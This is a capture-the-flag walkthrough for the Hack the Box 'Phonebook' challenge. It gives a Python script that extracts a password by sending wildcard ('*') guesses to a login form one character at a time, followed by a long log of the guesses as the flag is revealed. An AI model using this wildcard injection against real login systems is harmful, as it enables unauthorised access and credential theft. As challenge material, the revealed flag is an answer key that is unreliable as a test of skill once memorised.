Top 5 This Week

Related Posts

HTB – Hack the Box – Phonebook

Deep Dive into HTB – Hack the Box – Phonebook Challenge

This tutorial is part of our comprehensive “HTB – Hack the Box Series.” Explore more challenges at HTB – Hack the Box Series.

Overview of the Phonebook Challenge

HTB’s Phonebook challenge presents a unique opportunity to hone your cybersecurity skills. This guide will navigate through the process of exploiting the Phonebook application using advanced Python scripting and network request handling.

Initial Steps and Exploration

  • Begin by visiting the official challenge link: HTB Phonebook Challenge.
  • Access the Phonebook login page: Phonebook Login.
  • Note the URL structure on failed authentication: http://161.35.173.232:32643/login?message=Authentication%20failed.

Scripting the Exploit

The exploit involves a Python script to perform brute-force attacks on the login mechanism. Below is an outline of the script:

import requests
import string

# Defining headers and the URL for the Phonebook application
headers = {"UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"}
url = "http://161.35.173.232:32643/login"

# Character set for brute-forcing
chars = string.ascii_letters + ''.join(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '`', '~', '!', '@', '$', '%', '&', '-', '_', '>'])

# Initialization
counter = 0
flag = "HTB{"

# Brute-forcing loop
while True:
    # ...

Running the Exploit

  • Navigate to the script’s directory and execute the script.
  • Redirect output to a file for analysis: python3 exploit.py > flag.txt.
  • Review the output file to identify the correct flag.

Conclusion

The HTB Phonebook challenge offers a practical scenario for testing and improving your skills in Python scripting and security testing. This guide provides a detailed approach to exploit the Phonebook application, emphasizing the importance of methodical and technical precision in cybersecurity tasks.

Step-by-Step detailed tutorial

  • http://161.35.173.232:32643/login
  • URL received after failed authentication: http://161.35.173.232:32643/login?message=Authentication%20failed
import requests
import string

headers = {"UserAgent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"}
url = "http://161.35.173.232:32643/login"

chars = string.ascii_letters
chars += ''.join(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '`', '~', '!', '@', '$', '%', '&', '-', '_',>

counter = 0
flag = "HTB{"

while True:
    # if all chars are not correct means we previous already found the flag
    if counter == len(chars):
        print(flag + "}")
        break

    # creates something like HTB{a*}
    password = flag + chars[counter] + "*}"
    print("Trying: " + password)

    data = {"username" : "Reese", "password" : password}
    response = requests.post(url, headers=headers, data=data)
    
    if (response.url != url + "?message=Authentication%20failed"):
        # possible flag since we still using * at the end: e.g HTB{abc_*}.
        # append chars[] so that we not need to deal with removing "*}" as compared to if we assign password var>
        flag += chars[counter]
        counter = 0
    else:
        # increment the char since we might not have found the right letter
        counter += 1
┌──(toor㉿kali)-[~]
└─$ pwd                
/home/toor
                                                                                                            
┌──(toor㉿kali)-[~]
└─$ cd Downloads 
                                                                                                            
┌──(toor㉿kali)-[~/Downloads]
└─$ python3 exploit.py > flag.txt                
                                                                                                            
┌──(toor㉿kali)-[~/Downloads]
└─$
zsh: corrupt history file /home/toor/.zsh_history
┌──(toor㉿kali)-[~]
└─$ pwd                
/home/toor
                                                                                                                                                                                                                                        
┌──(toor㉿kali)-[~]
└─$ cd Downloads 
                                                                                                                                                                                                                                        
┌──(toor㉿kali)-[~/Downloads]
└─$ python3 exploit.py > flag.txt                
                                                                                                            
┌──(toor㉿kali)-[~/Downloads]
└─$ cat flag.txt                                            
Trying: HTB{a*}
Trying: HTB{b*}
Trying: HTB{c*}
Trying: HTB{d*}
Trying: HTB{da*}
Trying: HTB{db*}
Trying: HTB{dc*}
Trying: HTB{dd*}
Trying: HTB{de*}
Trying: HTB{df*}
Trying: HTB{dg*}
Trying: HTB{dh*}
Trying: HTB{di*}
Trying: HTB{dj*}
Trying: HTB{dk*}
Trying: HTB{dl*}
Trying: HTB{dm*}
Trying: HTB{dn*}
Trying: HTB{do*}
Trying: HTB{dp*}
Trying: HTB{dq*}
Trying: HTB{dr*}
Trying: HTB{ds*}
Trying: HTB{dt*}
Trying: HTB{du*}
Trying: HTB{dv*}
Trying: HTB{dw*}
Trying: HTB{dx*}
Trying: HTB{dy*}
Trying: HTB{dz*}
Trying: HTB{dA*}
Trying: HTB{dB*}
Trying: HTB{dC*}
Trying: HTB{dD*}
Trying: HTB{dE*}
Trying: HTB{dF*}
Trying: HTB{dG*}
Trying: HTB{dH*}
Trying: HTB{dI*}
Trying: HTB{dJ*}
Trying: HTB{dK*}
Trying: HTB{dL*}
Trying: HTB{dM*}
Trying: HTB{dN*}
Trying: HTB{dO*}
Trying: HTB{dP*}
Trying: HTB{dQ*}
Trying: HTB{dR*}
Trying: HTB{dS*}
Trying: HTB{dT*}
Trying: HTB{dU*}
Trying: HTB{dV*}
Trying: HTB{dW*}
Trying: HTB{dX*}
Trying: HTB{dY*}
Trying: HTB{dZ*}
Trying: HTB{d0*}
Trying: HTB{d1*}
Trying: HTB{d1a*}
Trying: HTB{d1b*}
Trying: HTB{d1c*}
Trying: HTB{d1d*}
Trying: HTB{d1e*}
Trying: HTB{d1f*}
Trying: HTB{d1g*}
Trying: HTB{d1h*}
Trying: HTB{d1i*}
Trying: HTB{d1j*}
Trying: HTB{d1k*}
Trying: HTB{d1l*}
Trying: HTB{d1m*}
Trying: HTB{d1n*}
Trying: HTB{d1o*}
Trying: HTB{d1p*}
Trying: HTB{d1q*}
Trying: HTB{d1r*}
Trying: HTB{d1ra*}
Trying: HTB{d1rb*}
Trying: HTB{d1rc*}
Trying: HTB{d1rd*}
Trying: HTB{d1re*}
Trying: HTB{d1rea*}
Trying: HTB{d1reb*}
Trying: HTB{d1rec*}
Trying: HTB{d1reca*}
Trying: HTB{d1recb*}
Trying: HTB{d1recc*}
Trying: HTB{d1recd*}
Trying: HTB{d1rece*}
Trying: HTB{d1recf*}
Trying: HTB{d1recg*}
Trying: HTB{d1rech*}
Trying: HTB{d1reci*}
Trying: HTB{d1recj*}
Trying: HTB{d1reck*}
Trying: HTB{d1recl*}
Trying: HTB{d1recm*}
Trying: HTB{d1recn*}
Trying: HTB{d1reco*}
Trying: HTB{d1recp*}
Trying: HTB{d1recq*}
Trying: HTB{d1recr*}
Trying: HTB{d1recs*}
Trying: HTB{d1rect*}
Trying: HTB{d1recta*}
Trying: HTB{d1rectb*}
Trying: HTB{d1rectc*}
Trying: HTB{d1rectd*}
Trying: HTB{d1recte*}
Trying: HTB{d1rectf*}
Trying: HTB{d1rectg*}
Trying: HTB{d1recth*}
Trying: HTB{d1recti*}
Trying: HTB{d1rectj*}
Trying: HTB{d1rectk*}
Trying: HTB{d1rectl*}
Trying: HTB{d1rectm*}
Trying: HTB{d1rectn*}
Trying: HTB{d1recto*}
Trying: HTB{d1rectoa*}
Trying: HTB{d1rectob*}
Trying: HTB{d1rectoc*}
Trying: HTB{d1rectod*}
Trying: HTB{d1rectoe*}
Trying: HTB{d1rectof*}
Trying: HTB{d1rectog*}
Trying: HTB{d1rectoh*}
Trying: HTB{d1rectoi*}
Trying: HTB{d1rectoj*}
Trying: HTB{d1rectok*}
Trying: HTB{d1rectol*}
Trying: HTB{d1rectom*}
Trying: HTB{d1recton*}
Trying: HTB{d1rectoo*}
Trying: HTB{d1rectop*}
Trying: HTB{d1rectoq*}
Trying: HTB{d1rector*}
Trying: HTB{d1rectora*}
Trying: HTB{d1rectorb*}
Trying: HTB{d1rectorc*}
Trying: HTB{d1rectord*}
Trying: HTB{d1rectore*}
Trying: HTB{d1rectorf*}
Trying: HTB{d1rectorg*}
Trying: HTB{d1rectorh*}
Trying: HTB{d1rectori*}
Trying: HTB{d1rectorj*}
Trying: HTB{d1rectork*}
Trying: HTB{d1rectorl*}
Trying: HTB{d1rectorm*}
Trying: HTB{d1rectorn*}
Trying: HTB{d1rectoro*}
Trying: HTB{d1rectorp*}
Trying: HTB{d1rectorq*}
Trying: HTB{d1rectorr*}
Trying: HTB{d1rectors*}
Trying: HTB{d1rectort*}
Trying: HTB{d1rectoru*}
Trying: HTB{d1rectorv*}
Trying: HTB{d1rectorw*}
Trying: HTB{d1rectorx*}
Trying: HTB{d1rectory*}
Trying: HTB{d1rectorya*}
Trying: HTB{d1rectoryb*}
Trying: HTB{d1rectoryc*}
Trying: HTB{d1rectoryd*}
Trying: HTB{d1rectorye*}
Trying: HTB{d1rectoryf*}
Trying: HTB{d1rectoryg*}
Trying: HTB{d1rectoryh*}
Trying: HTB{d1rectoryi*}
Trying: HTB{d1rectoryj*}
Trying: HTB{d1rectoryk*}
Trying: HTB{d1rectoryl*}
Trying: HTB{d1rectorym*}
Trying: HTB{d1rectoryn*}
Trying: HTB{d1rectoryo*}
Trying: HTB{d1rectoryp*}
Trying: HTB{d1rectoryq*}
Trying: HTB{d1rectoryr*}
Trying: HTB{d1rectorys*}
Trying: HTB{d1rectoryt*}
Trying: HTB{d1rectoryu*}
Trying: HTB{d1rectoryv*}
Trying: HTB{d1rectoryw*}
Trying: HTB{d1rectoryx*}
Trying: HTB{d1rectoryy*}
Trying: HTB{d1rectoryz*}
Trying: HTB{d1rectoryA*}
Trying: HTB{d1rectoryB*}
Trying: HTB{d1rectoryC*}
Trying: HTB{d1rectoryD*}
Trying: HTB{d1rectoryE*}
Trying: HTB{d1rectoryF*}
Trying: HTB{d1rectoryG*}
Trying: HTB{d1rectoryH*}
Trying: HTB{d1rectoryI*}
Trying: HTB{d1rectoryJ*}
Trying: HTB{d1rectoryK*}
Trying: HTB{d1rectoryL*}
Trying: HTB{d1rectoryM*}
Trying: HTB{d1rectoryN*}
Trying: HTB{d1rectoryO*}
Trying: HTB{d1rectoryP*}
Trying: HTB{d1rectoryQ*}
Trying: HTB{d1rectoryR*}
Trying: HTB{d1rectoryS*}
Trying: HTB{d1rectoryT*}
Trying: HTB{d1rectoryU*}
Trying: HTB{d1rectoryV*}
Trying: HTB{d1rectoryW*}
Trying: HTB{d1rectoryX*}
Trying: HTB{d1rectoryY*}
Trying: HTB{d1rectoryZ*}
Trying: HTB{d1rectory0*}
Trying: HTB{d1rectory1*}
Trying: HTB{d1rectory2*}
Trying: HTB{d1rectory3*}
Trying: HTB{d1rectory4*}
Trying: HTB{d1rectory5*}
Trying: HTB{d1rectory6*}
Trying: HTB{d1rectory7*}
Trying: HTB{d1rectory8*}
Trying: HTB{d1rectory9*}
Trying: HTB{d1rectory`*}
Trying: HTB{d1rectory~*}
Trying: HTB{d1rectory!*}
Trying: HTB{d1rectory@*}
Trying: HTB{d1rectory$*}
Trying: HTB{d1rectory%*}
Trying: HTB{d1rectory&*}
Trying: HTB{d1rectory-*}
Trying: HTB{d1rectory_*}
Trying: HTB{d1rectory_a*}
Trying: HTB{d1rectory_b*}
Trying: HTB{d1rectory_c*}
Trying: HTB{d1rectory_d*}
Trying: HTB{d1rectory_e*}
Trying: HTB{d1rectory_f*}
Trying: HTB{d1rectory_g*}
Trying: HTB{d1rectory_h*}
Trying: HTB{d1rectory_ha*}
Trying: HTB{d1rectory_hb*}
Trying: HTB{d1rectory_hc*}
Trying: HTB{d1rectory_hd*}
Trying: HTB{d1rectory_he*}
Trying: HTB{d1rectory_hf*}
Trying: HTB{d1rectory_hg*}
Trying: HTB{d1rectory_hh*}
Trying: HTB{d1rectory_hi*}
Trying: HTB{d1rectory_hj*}
Trying: HTB{d1rectory_hk*}
Trying: HTB{d1rectory_hl*}
Trying: HTB{d1rectory_hm*}
Trying: HTB{d1rectory_hn*}
Trying: HTB{d1rectory_ho*}
Trying: HTB{d1rectory_hp*}
Trying: HTB{d1rectory_hq*}
Trying: HTB{d1rectory_hr*}
Trying: HTB{d1rectory_hs*}
Trying: HTB{d1rectory_ht*}
Trying: HTB{d1rectory_hu*}
Trying: HTB{d1rectory_hv*}
Trying: HTB{d1rectory_hw*}
Trying: HTB{d1rectory_hx*}
Trying: HTB{d1rectory_hy*}
Trying: HTB{d1rectory_hz*}
Trying: HTB{d1rectory_hA*}
Trying: HTB{d1rectory_hB*}
Trying: HTB{d1rectory_hC*}
Trying: HTB{d1rectory_hD*}
Trying: HTB{d1rectory_hE*}
Trying: HTB{d1rectory_hF*}
Trying: HTB{d1rectory_hG*}
Trying: HTB{d1rectory_hH*}
Trying: HTB{d1rectory_hI*}
Trying: HTB{d1rectory_hJ*}
Trying: HTB{d1rectory_hK*}
Trying: HTB{d1rectory_hL*}
Trying: HTB{d1rectory_hM*}
Trying: HTB{d1rectory_hN*}
Trying: HTB{d1rectory_hO*}
Trying: HTB{d1rectory_hP*}
Trying: HTB{d1rectory_hQ*}
Trying: HTB{d1rectory_hR*}
Trying: HTB{d1rectory_hS*}
Trying: HTB{d1rectory_hT*}
Trying: HTB{d1rectory_hU*}
Trying: HTB{d1rectory_hV*}
Trying: HTB{d1rectory_hW*}
Trying: HTB{d1rectory_hX*}
Trying: HTB{d1rectory_hY*}
Trying: HTB{d1rectory_hZ*}
Trying: HTB{d1rectory_h0*}
Trying: HTB{d1rectory_h1*}
Trying: HTB{d1rectory_h2*}
Trying: HTB{d1rectory_h3*}
Trying: HTB{d1rectory_h4*}
Trying: HTB{d1rectory_h4a*}
Trying: HTB{d1rectory_h4b*}
Trying: HTB{d1rectory_h4c*}
Trying: HTB{d1rectory_h4d*}
Trying: HTB{d1rectory_h4e*}
Trying: HTB{d1rectory_h4f*}
Trying: HTB{d1rectory_h4g*}
Trying: HTB{d1rectory_h4h*}
Trying: HTB{d1rectory_h4i*}
Trying: HTB{d1rectory_h4j*}
Trying: HTB{d1rectory_h4k*}
Trying: HTB{d1rectory_h4l*}
Trying: HTB{d1rectory_h4m*}
Trying: HTB{d1rectory_h4n*}
Trying: HTB{d1rectory_h4o*}
Trying: HTB{d1rectory_h4p*}
Trying: HTB{d1rectory_h4q*}
Trying: HTB{d1rectory_h4r*}
Trying: HTB{d1rectory_h4s*}
Trying: HTB{d1rectory_h4t*}
Trying: HTB{d1rectory_h4u*}
Trying: HTB{d1rectory_h4v*}
Trying: HTB{d1rectory_h4w*}
Trying: HTB{d1rectory_h4x*}
Trying: HTB{d1rectory_h4xa*}
Trying: HTB{d1rectory_h4xb*}
Trying: HTB{d1rectory_h4xc*}
Trying: HTB{d1rectory_h4xd*}
Trying: HTB{d1rectory_h4xe*}
Trying: HTB{d1rectory_h4xf*}
Trying: HTB{d1rectory_h4xg*}
Trying: HTB{d1rectory_h4xh*}
Trying: HTB{d1rectory_h4xi*}
Trying: HTB{d1rectory_h4xj*}
Trying: HTB{d1rectory_h4xk*}
Trying: HTB{d1rectory_h4xl*}
Trying: HTB{d1rectory_h4xm*}
Trying: HTB{d1rectory_h4xn*}
Trying: HTB{d1rectory_h4xo*}
Trying: HTB{d1rectory_h4xp*}
Trying: HTB{d1rectory_h4xq*}
Trying: HTB{d1rectory_h4xr*}
Trying: HTB{d1rectory_h4xs*}
Trying: HTB{d1rectory_h4xt*}
Trying: HTB{d1rectory_h4xu*}
Trying: HTB{d1rectory_h4xv*}
Trying: HTB{d1rectory_h4xw*}
Trying: HTB{d1rectory_h4xx*}
Trying: HTB{d1rectory_h4xxa*}
Trying: HTB{d1rectory_h4xxb*}
Trying: HTB{d1rectory_h4xxc*}
Trying: HTB{d1rectory_h4xxd*}
Trying: HTB{d1rectory_h4xxe*}
Trying: HTB{d1rectory_h4xxf*}
Trying: HTB{d1rectory_h4xxg*}
Trying: HTB{d1rectory_h4xxh*}
Trying: HTB{d1rectory_h4xxi*}
Trying: HTB{d1rectory_h4xxj*}
Trying: HTB{d1rectory_h4xxk*}
Trying: HTB{d1rectory_h4xxl*}
Trying: HTB{d1rectory_h4xxm*}
Trying: HTB{d1rectory_h4xxn*}
Trying: HTB{d1rectory_h4xxo*}
Trying: HTB{d1rectory_h4xxp*}
Trying: HTB{d1rectory_h4xxq*}
Trying: HTB{d1rectory_h4xxr*}
Trying: HTB{d1rectory_h4xxs*}
Trying: HTB{d1rectory_h4xxt*}
Trying: HTB{d1rectory_h4xxu*}
Trying: HTB{d1rectory_h4xxv*}
Trying: HTB{d1rectory_h4xxw*}
Trying: HTB{d1rectory_h4xxx*}
Trying: HTB{d1rectory_h4xxy*}
Trying: HTB{d1rectory_h4xxz*}
Trying: HTB{d1rectory_h4xxA*}
Trying: HTB{d1rectory_h4xxB*}
Trying: HTB{d1rectory_h4xxC*}
Trying: HTB{d1rectory_h4xxD*}
Trying: HTB{d1rectory_h4xxE*}
Trying: HTB{d1rectory_h4xxF*}
Trying: HTB{d1rectory_h4xxG*}
Trying: HTB{d1rectory_h4xxH*}
Trying: HTB{d1rectory_h4xxI*}
Trying: HTB{d1rectory_h4xxJ*}
Trying: HTB{d1rectory_h4xxK*}
Trying: HTB{d1rectory_h4xxL*}
Trying: HTB{d1rectory_h4xxM*}
Trying: HTB{d1rectory_h4xxN*}
Trying: HTB{d1rectory_h4xxO*}
Trying: HTB{d1rectory_h4xxP*}
Trying: HTB{d1rectory_h4xxQ*}
Trying: HTB{d1rectory_h4xxR*}
Trying: HTB{d1rectory_h4xxS*}
Trying: HTB{d1rectory_h4xxT*}
Trying: HTB{d1rectory_h4xxU*}
Trying: HTB{d1rectory_h4xxV*}
Trying: HTB{d1rectory_h4xxW*}
Trying: HTB{d1rectory_h4xxX*}
Trying: HTB{d1rectory_h4xxY*}
Trying: HTB{d1rectory_h4xxZ*}
Trying: HTB{d1rectory_h4xx0*}
Trying: HTB{d1rectory_h4xx0a*}
Trying: HTB{d1rectory_h4xx0b*}
Trying: HTB{d1rectory_h4xx0c*}
Trying: HTB{d1rectory_h4xx0d*}
Trying: HTB{d1rectory_h4xx0e*}
Trying: HTB{d1rectory_h4xx0f*}
Trying: HTB{d1rectory_h4xx0g*}
Trying: HTB{d1rectory_h4xx0h*}
Trying: HTB{d1rectory_h4xx0i*}
Trying: HTB{d1rectory_h4xx0j*}
Trying: HTB{d1rectory_h4xx0k*}
Trying: HTB{d1rectory_h4xx0l*}
Trying: HTB{d1rectory_h4xx0m*}
Trying: HTB{d1rectory_h4xx0n*}
Trying: HTB{d1rectory_h4xx0o*}
Trying: HTB{d1rectory_h4xx0p*}
Trying: HTB{d1rectory_h4xx0q*}
Trying: HTB{d1rectory_h4xx0r*}
Trying: HTB{d1rectory_h4xx0ra*}
Trying: HTB{d1rectory_h4xx0rb*}
Trying: HTB{d1rectory_h4xx0rc*}
Trying: HTB{d1rectory_h4xx0rd*}
Trying: HTB{d1rectory_h4xx0re*}
Trying: HTB{d1rectory_h4xx0rf*}
Trying: HTB{d1rectory_h4xx0rg*}
Trying: HTB{d1rectory_h4xx0rh*}
Trying: HTB{d1rectory_h4xx0ri*}
Trying: HTB{d1rectory_h4xx0rj*}
Trying: HTB{d1rectory_h4xx0rk*}
Trying: HTB{d1rectory_h4xx0rl*}
Trying: HTB{d1rectory_h4xx0rm*}
Trying: HTB{d1rectory_h4xx0rn*}
Trying: HTB{d1rectory_h4xx0ro*}
Trying: HTB{d1rectory_h4xx0rp*}
Trying: HTB{d1rectory_h4xx0rq*}
Trying: HTB{d1rectory_h4xx0rr*}
Trying: HTB{d1rectory_h4xx0rs*}
Trying: HTB{d1rectory_h4xx0rt*}
Trying: HTB{d1rectory_h4xx0ru*}
Trying: HTB{d1rectory_h4xx0rv*}
Trying: HTB{d1rectory_h4xx0rw*}
Trying: HTB{d1rectory_h4xx0rx*}
Trying: HTB{d1rectory_h4xx0ry*}
Trying: HTB{d1rectory_h4xx0rz*}
Trying: HTB{d1rectory_h4xx0rA*}
Trying: HTB{d1rectory_h4xx0rB*}
Trying: HTB{d1rectory_h4xx0rC*}
Trying: HTB{d1rectory_h4xx0rD*}
Trying: HTB{d1rectory_h4xx0rE*}
Trying: HTB{d1rectory_h4xx0rF*}
Trying: HTB{d1rectory_h4xx0rG*}
Trying: HTB{d1rectory_h4xx0rH*}
Trying: HTB{d1rectory_h4xx0rI*}
Trying: HTB{d1rectory_h4xx0rJ*}
Trying: HTB{d1rectory_h4xx0rK*}
Trying: HTB{d1rectory_h4xx0rL*}
Trying: HTB{d1rectory_h4xx0rM*}
Trying: HTB{d1rectory_h4xx0rN*}
Trying: HTB{d1rectory_h4xx0rO*}
Trying: HTB{d1rectory_h4xx0rP*}
Trying: HTB{d1rectory_h4xx0rQ*}
Trying: HTB{d1rectory_h4xx0rR*}
Trying: HTB{d1rectory_h4xx0rS*}
Trying: HTB{d1rectory_h4xx0rT*}
Trying: HTB{d1rectory_h4xx0rU*}
Trying: HTB{d1rectory_h4xx0rV*}
Trying: HTB{d1rectory_h4xx0rW*}
Trying: HTB{d1rectory_h4xx0rX*}
Trying: HTB{d1rectory_h4xx0rY*}
Trying: HTB{d1rectory_h4xx0rZ*}
Trying: HTB{d1rectory_h4xx0r0*}
Trying: HTB{d1rectory_h4xx0r1*}
Trying: HTB{d1rectory_h4xx0r2*}
Trying: HTB{d1rectory_h4xx0r3*}
Trying: HTB{d1rectory_h4xx0r4*}
Trying: HTB{d1rectory_h4xx0r5*}
Trying: HTB{d1rectory_h4xx0r6*}
Trying: HTB{d1rectory_h4xx0r7*}
Trying: HTB{d1rectory_h4xx0r8*}
Trying: HTB{d1rectory_h4xx0r9*}
Trying: HTB{d1rectory_h4xx0r`*}
Trying: HTB{d1rectory_h4xx0r~*}
Trying: HTB{d1rectory_h4xx0r!*}
Trying: HTB{d1rectory_h4xx0r@*}
Trying: HTB{d1rectory_h4xx0r$*}
Trying: HTB{d1rectory_h4xx0r%*}
Trying: HTB{d1rectory_h4xx0r&*}
Trying: HTB{d1rectory_h4xx0r-*}
Trying: HTB{d1rectory_h4xx0r_*}
Trying: HTB{d1rectory_h4xx0r_a*}
Trying: HTB{d1rectory_h4xx0r_b*}
Trying: HTB{d1rectory_h4xx0r_c*}
Trying: HTB{d1rectory_h4xx0r_d*}
Trying: HTB{d1rectory_h4xx0r_e*}
Trying: HTB{d1rectory_h4xx0r_f*}
Trying: HTB{d1rectory_h4xx0r_g*}
Trying: HTB{d1rectory_h4xx0r_h*}
Trying: HTB{d1rectory_h4xx0r_i*}
Trying: HTB{d1rectory_h4xx0r_ia*}
Trying: HTB{d1rectory_h4xx0r_ib*}
Trying: HTB{d1rectory_h4xx0r_ic*}
Trying: HTB{d1rectory_h4xx0r_id*}
Trying: HTB{d1rectory_h4xx0r_ie*}
Trying: HTB{d1rectory_h4xx0r_if*}
Trying: HTB{d1rectory_h4xx0r_ig*}
Trying: HTB{d1rectory_h4xx0r_ih*}
Trying: HTB{d1rectory_h4xx0r_ii*}
Trying: HTB{d1rectory_h4xx0r_ij*}
Trying: HTB{d1rectory_h4xx0r_ik*}
Trying: HTB{d1rectory_h4xx0r_il*}
Trying: HTB{d1rectory_h4xx0r_im*}
Trying: HTB{d1rectory_h4xx0r_in*}
Trying: HTB{d1rectory_h4xx0r_io*}
Trying: HTB{d1rectory_h4xx0r_ip*}
Trying: HTB{d1rectory_h4xx0r_iq*}
Trying: HTB{d1rectory_h4xx0r_ir*}
Trying: HTB{d1rectory_h4xx0r_is*}
Trying: HTB{d1rectory_h4xx0r_isa*}
Trying: HTB{d1rectory_h4xx0r_isb*}
Trying: HTB{d1rectory_h4xx0r_isc*}
Trying: HTB{d1rectory_h4xx0r_isd*}
Trying: HTB{d1rectory_h4xx0r_ise*}
Trying: HTB{d1rectory_h4xx0r_isf*}
Trying: HTB{d1rectory_h4xx0r_isg*}
Trying: HTB{d1rectory_h4xx0r_ish*}
Trying: HTB{d1rectory_h4xx0r_isi*}
Trying: HTB{d1rectory_h4xx0r_isj*}
Trying: HTB{d1rectory_h4xx0r_isk*}
Trying: HTB{d1rectory_h4xx0r_isl*}
Trying: HTB{d1rectory_h4xx0r_ism*}
Trying: HTB{d1rectory_h4xx0r_isn*}
Trying: HTB{d1rectory_h4xx0r_iso*}
Trying: HTB{d1rectory_h4xx0r_isp*}
Trying: HTB{d1rectory_h4xx0r_isq*}
Trying: HTB{d1rectory_h4xx0r_isr*}
Trying: HTB{d1rectory_h4xx0r_iss*}
Trying: HTB{d1rectory_h4xx0r_ist*}
Trying: HTB{d1rectory_h4xx0r_isu*}
Trying: HTB{d1rectory_h4xx0r_isv*}
Trying: HTB{d1rectory_h4xx0r_isw*}
Trying: HTB{d1rectory_h4xx0r_isx*}
Trying: HTB{d1rectory_h4xx0r_isy*}
Trying: HTB{d1rectory_h4xx0r_isz*}
Trying: HTB{d1rectory_h4xx0r_isA*}
Trying: HTB{d1rectory_h4xx0r_isB*}
Trying: HTB{d1rectory_h4xx0r_isC*}
Trying: HTB{d1rectory_h4xx0r_isD*}
Trying: HTB{d1rectory_h4xx0r_isE*}
Trying: HTB{d1rectory_h4xx0r_isF*}
Trying: HTB{d1rectory_h4xx0r_isG*}
Trying: HTB{d1rectory_h4xx0r_isH*}
Trying: HTB{d1rectory_h4xx0r_isI*}
Trying: HTB{d1rectory_h4xx0r_isJ*}
Trying: HTB{d1rectory_h4xx0r_isK*}
Trying: HTB{d1rectory_h4xx0r_isL*}
Trying: HTB{d1rectory_h4xx0r_isM*}
Trying: HTB{d1rectory_h4xx0r_isN*}
Trying: HTB{d1rectory_h4xx0r_isO*}
Trying: HTB{d1rectory_h4xx0r_isP*}
Trying: HTB{d1rectory_h4xx0r_isQ*}
Trying: HTB{d1rectory_h4xx0r_isR*}
Trying: HTB{d1rectory_h4xx0r_isS*}
Trying: HTB{d1rectory_h4xx0r_isT*}
Trying: HTB{d1rectory_h4xx0r_isU*}
Trying: HTB{d1rectory_h4xx0r_isV*}
Trying: HTB{d1rectory_h4xx0r_isW*}
Trying: HTB{d1rectory_h4xx0r_isX*}
Trying: HTB{d1rectory_h4xx0r_isY*}
Trying: HTB{d1rectory_h4xx0r_isZ*}
Trying: HTB{d1rectory_h4xx0r_is0*}
Trying: HTB{d1rectory_h4xx0r_is1*}
Trying: HTB{d1rectory_h4xx0r_is2*}
Trying: HTB{d1rectory_h4xx0r_is3*}
Trying: HTB{d1rectory_h4xx0r_is4*}
Trying: HTB{d1rectory_h4xx0r_is5*}
Trying: HTB{d1rectory_h4xx0r_is6*}
Trying: HTB{d1rectory_h4xx0r_is7*}
Trying: HTB{d1rectory_h4xx0r_is8*}
Trying: HTB{d1rectory_h4xx0r_is9*}
Trying: HTB{d1rectory_h4xx0r_is`*}
Trying: HTB{d1rectory_h4xx0r_is~*}
Trying: HTB{d1rectory_h4xx0r_is!*}
Trying: HTB{d1rectory_h4xx0r_is@*}
Trying: HTB{d1rectory_h4xx0r_is$*}
Trying: HTB{d1rectory_h4xx0r_is%*}
Trying: HTB{d1rectory_h4xx0r_is&*}
Trying: HTB{d1rectory_h4xx0r_is-*}
Trying: HTB{d1rectory_h4xx0r_is_*}
Trying: HTB{d1rectory_h4xx0r_is_a*}
Trying: HTB{d1rectory_h4xx0r_is_b*}
Trying: HTB{d1rectory_h4xx0r_is_c*}
Trying: HTB{d1rectory_h4xx0r_is_d*}
Trying: HTB{d1rectory_h4xx0r_is_e*}
Trying: HTB{d1rectory_h4xx0r_is_f*}
Trying: HTB{d1rectory_h4xx0r_is_g*}
Trying: HTB{d1rectory_h4xx0r_is_h*}
Trying: HTB{d1rectory_h4xx0r_is_i*}
Trying: HTB{d1rectory_h4xx0r_is_j*}
Trying: HTB{d1rectory_h4xx0r_is_k*}
Trying: HTB{d1rectory_h4xx0r_is_ka*}
Trying: HTB{d1rectory_h4xx0r_is_kb*}
Trying: HTB{d1rectory_h4xx0r_is_kc*}
Trying: HTB{d1rectory_h4xx0r_is_kd*}
Trying: HTB{d1rectory_h4xx0r_is_ke*}
Trying: HTB{d1rectory_h4xx0r_is_kf*}
Trying: HTB{d1rectory_h4xx0r_is_kg*}
Trying: HTB{d1rectory_h4xx0r_is_kh*}
Trying: HTB{d1rectory_h4xx0r_is_ki*}
Trying: HTB{d1rectory_h4xx0r_is_kj*}
Trying: HTB{d1rectory_h4xx0r_is_kk*}
Trying: HTB{d1rectory_h4xx0r_is_kl*}
Trying: HTB{d1rectory_h4xx0r_is_km*}
Trying: HTB{d1rectory_h4xx0r_is_kn*}
Trying: HTB{d1rectory_h4xx0r_is_ko*}
Trying: HTB{d1rectory_h4xx0r_is_kp*}
Trying: HTB{d1rectory_h4xx0r_is_kq*}
Trying: HTB{d1rectory_h4xx0r_is_kr*}
Trying: HTB{d1rectory_h4xx0r_is_ks*}
Trying: HTB{d1rectory_h4xx0r_is_kt*}
Trying: HTB{d1rectory_h4xx0r_is_ku*}
Trying: HTB{d1rectory_h4xx0r_is_kv*}
Trying: HTB{d1rectory_h4xx0r_is_kw*}
Trying: HTB{d1rectory_h4xx0r_is_kx*}
Trying: HTB{d1rectory_h4xx0r_is_ky*}
Trying: HTB{d1rectory_h4xx0r_is_kz*}
Trying: HTB{d1rectory_h4xx0r_is_kA*}
Trying: HTB{d1rectory_h4xx0r_is_kB*}
Trying: HTB{d1rectory_h4xx0r_is_kC*}
Trying: HTB{d1rectory_h4xx0r_is_kD*}
Trying: HTB{d1rectory_h4xx0r_is_kE*}
Trying: HTB{d1rectory_h4xx0r_is_kF*}
Trying: HTB{d1rectory_h4xx0r_is_kG*}
Trying: HTB{d1rectory_h4xx0r_is_kH*}
Trying: HTB{d1rectory_h4xx0r_is_kI*}
Trying: HTB{d1rectory_h4xx0r_is_kJ*}
Trying: HTB{d1rectory_h4xx0r_is_kK*}
Trying: HTB{d1rectory_h4xx0r_is_kL*}
Trying: HTB{d1rectory_h4xx0r_is_kM*}
Trying: HTB{d1rectory_h4xx0r_is_kN*}
Trying: HTB{d1rectory_h4xx0r_is_kO*}
Trying: HTB{d1rectory_h4xx0r_is_kP*}
Trying: HTB{d1rectory_h4xx0r_is_kQ*}
Trying: HTB{d1rectory_h4xx0r_is_kR*}
Trying: HTB{d1rectory_h4xx0r_is_kS*}
Trying: HTB{d1rectory_h4xx0r_is_kT*}
Trying: HTB{d1rectory_h4xx0r_is_kU*}
Trying: HTB{d1rectory_h4xx0r_is_kV*}
